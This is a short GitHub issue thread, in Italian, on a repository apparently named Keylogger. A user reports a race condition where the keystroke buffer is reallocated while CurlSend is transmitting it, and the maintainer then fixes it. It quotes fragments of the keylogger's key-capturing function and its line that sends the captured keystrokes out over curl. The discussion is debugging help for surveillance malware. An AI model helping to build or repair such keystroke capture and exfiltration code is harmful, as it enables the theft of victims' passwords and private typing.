### ISSUE TITLE
Conflitto buffer su reallocazione

### ISSUE THREAD

**Issue by Ixiodor** [gianlucag/Keylogger#4]
> 	int res = CurlSend(buffer, len, "text=");

Potrebbe essere in processo mentre avviene questo:

>  void SaveKey(unsigned int key)
> {
> 	char keyStr[16];
> 	ConvertKey(key, keyStr);
> 
> 	// lock
> 	WaitForSingleObject(mutex, INFINITE);
> 
> 	int len = strlen(buffer);
> 	int available = bufferSize - len;
> 
> 	if (strlen(keyStr) >= available)
> 	{
> 		bufferSize *= 2;
> 		buffer = realloc(buffer, bufferSize);
> 	}
> 
> 	strcat(buffer, keyStr);
> 
> 	// unlock
> 	ReleaseMutex(mutex);
> }
> 
Andando in conflitto in quanto il buffer non è protetto da mutex mentre è in CurlSend.

**Comment by gianlucag** [comment]
giusto, stasera faccio il fix

**Comment by gianlucag** [comment]
sistemato il problema
